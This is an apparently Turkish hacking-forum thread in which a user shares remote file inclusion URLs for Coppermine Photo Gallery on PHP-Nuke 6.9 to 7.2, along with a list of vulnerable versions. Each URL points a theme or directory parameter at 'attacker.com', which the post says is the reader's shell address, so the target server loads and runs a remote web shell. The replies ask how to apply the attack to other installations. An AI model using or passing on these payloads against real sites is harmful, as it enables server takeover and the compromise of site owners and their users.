Coppermine Photo Gallery Vulnerabilities

[Partizan]

BeLki Cok Kisi bu acigi biLiyordur ama son gunceLLemeLeri yapiLmamis bir kac IncLude yoLu daha var biLmeyenLer icin payLasmak istedim..

Remote file include:

http://www.example.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com

http://www.example.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com

http://www.example.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com

http://www.example.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

example.com = HackLencek Site
nuke72 = Nuke yoLu
attacker.com = SheLL adresiniz.

CaListigi VersiyonLar :

Francisco Burzi PHP-Nuke 7.2
Francisco Burzi PHP-Nuke 7.1
Francisco Burzi PHP-Nuke 7.0 FINAL
Francisco Burzi PHP-Nuke 7.0
Francisco Burzi PHP-Nuke 6.9
Coppermine Photo Gallery 1.2.2 b
Coppermine Photo Gallery 1.2.1
Coppermine Photo Gallery 1.2
Coppermine Photo Gallery 1.1 beta 2
Coppermine Photo Gallery 1.1 .0
Coppermine Photo Gallery 1.0 RC3

 

[Emuman]

Diyelim adam modülle oynadı ve o dosyaların isimlerini değiştirdi "init.inc.php" vs vs...ne olacak ozaman?

 

[Phara0h]

Şansına KüsücekSin Yada Davs Ile Lamerist Yasantina Devam Ediceksin .]

 

[emertcan]

sağolasn ama pek fazla yaygın olmayan bir açık sanırım

 

[eNergy35]

aksine
basit bi yöntem

 

[turx]

peki sadece coppermine kullanan birinde bu açıkları nasıl kullanabiliriz ?